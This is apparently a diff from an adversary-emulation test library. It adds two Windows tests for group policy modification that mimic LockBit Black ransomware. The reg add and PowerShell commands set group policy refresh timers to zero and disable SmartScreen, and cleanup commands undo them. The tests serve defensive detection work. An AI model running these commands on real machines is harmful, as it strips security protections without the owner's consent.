reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v ShellSmartScreenLevel /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: LockBit Black - Modify Group policy settings -Powershell
auto_generated_guid: b51eae65-5441-4789-b8e8-64783c26c1d1
description: 'An adversary modifies group policy settings
'
supported_platforms:
- windows
executor:
command: |
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeDC -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffsetDC -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTime -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffset -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name EnableSmartScreen -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name ShellSmartScreenLevel -Force
cleanup_command: "Remove-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\"
-Name GroupPolicyRefreshTimeDC -Force -ErrorAction Ignore\nRemove-ItemProperty
\"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\" -Name GroupPolicyRefreshTimeOffsetDC
-Force -ErrorAction Ignore \nRemove-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\"
-Name GroupPolicyRefreshTime -Force -ErrorAction Ignore\nRemove-ItemProperty
\"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\" -Name GroupPolicyRefreshTimeOffset
-Force -ErrorAction Ignore\nRemove-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\"
-Name EnableSmartScreen -Force -ErrorAction Ignore\nRemove-ItemProperty
\"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\" -Name ShellSmartScreenLevel
-Force -ErrorAction Ignore\n"
name: powershell
elevation_required: true
T1078.001:
technique:
x_mitre_platforms:
@@ -31873,7 +31925,59 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- User
atomic_tests: []
identifier: T1484.001
atomic_tests:
- name: LockBit Black - Modify Group policy settings -cmd
auto_generated_guid: 9ab80952-74ee-43da-a98c-1e740a985f28
description: 'An adversary can modify the group policy settings.
'
supported_platforms:
- windows
executor:
command: |
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeDC /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffsetDC /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTime /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffset /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v ShellSmartScreenLevel /t REG_SZ /d Block /f
cleanup_command: |
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeDC /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffsetDC /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTime /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffset /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v ShellSmartScreenLevel /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: LockBit Black - Modify Group policy settings -Powershell
auto_generated_guid: b51eae65-5441-4789-b8e8-64783c26c1d1
description: 'An adversary modifies group policy settings
'
supported_platforms:
- windows
executor:
command: |
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeDC -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffsetDC -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTime -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffset -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name EnableSmartScreen -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name ShellSmartScreenLevel -Force
cleanup_command: "Remove-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\"
-Name GroupPolicyRefreshTimeDC -Force -ErrorAction Ignore\nRemove-ItemProperty
\"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\" -Name GroupPolicyRefreshTimeOffsetDC
-Force -ErrorAction Ignore \nRemove-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\"
-Name GroupPolicyRefreshTime -Force -ErrorAction Ignore\nRemove-ItemProperty
\"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\" -Name GroupPolicyRefreshTimeOffset
-Force -ErrorAction Ignore\nRemove-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\"
-Name EnableSmartScreen -Force -ErrorAction Ignore\nRemove-ItemProperty
\"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\" -Name ShellSmartScreenLevel
-Force -ErrorAction Ignore\n"
name: powershell
elevation_required: true
T1078.001:
technique:
x_mitre_platforms:
atomics/T1484.001/T1484.001.md
+101
View File
@@ -0,0 +1,101 @@
# T1484.001 - Group Policy Modification
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1484/001)
<blockquote>Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path <code>\\&lt;DOMAIN&gt;\SYSVOL\&lt;DOMAIN&gt;\Policies\</code>.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.
Malicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)
For example, publicly available scripts such as <code>New-GPOImmediateTask</code> can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <code>&lt;GPO_PATH&gt;\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml</code>.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <code>&lt;GPO_PATH&gt;\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf</code>, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)</blockquote>
## Atomic Tests
- [Atomic Test #1 - LockBit Black - Modify Group policy settings -cmd](#atomic-test-1---lockbit-black---modify-group-policy-settings--cmd)
- [Atomic Test #2 - LockBit Black - Modify Group policy settings -Powershell](#atomic-test-2---lockbit-black---modify-group-policy-settings--powershell)
<br/>
## Atomic Test #1 - LockBit Black - Modify Group policy settings -cmd
An adversary can modify the group policy settings.
**Supported Platforms:** Windows
**auto_generated_guid:** 9ab80952-74ee-43da-a98c-1e740a985f28
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeDC /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffsetDC /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTime /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffset /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v ShellSmartScreenLevel /t REG_SZ /d Block /f
```
#### Cleanup Commands:
```cmd
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeDC /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffsetDC /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTime /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffset /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v ShellSmartScreenLevel /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #2 - LockBit Black - Modify Group policy settings -Powershell
An adversary modifies group policy settings
**Supported Platforms:** Windows
**auto_generated_guid:** b51eae65-5441-4789-b8e8-64783c26c1d1
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeDC -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffsetDC -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTime -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffset -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name EnableSmartScreen -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name ShellSmartScreenLevel -Force
```
#### Cleanup Commands:
```powershell
Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeDC -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffsetDC -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTime -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffset -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name EnableSmartScreen -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name ShellSmartScreenLevel -Force -ErrorAction Ignore
```
<br/>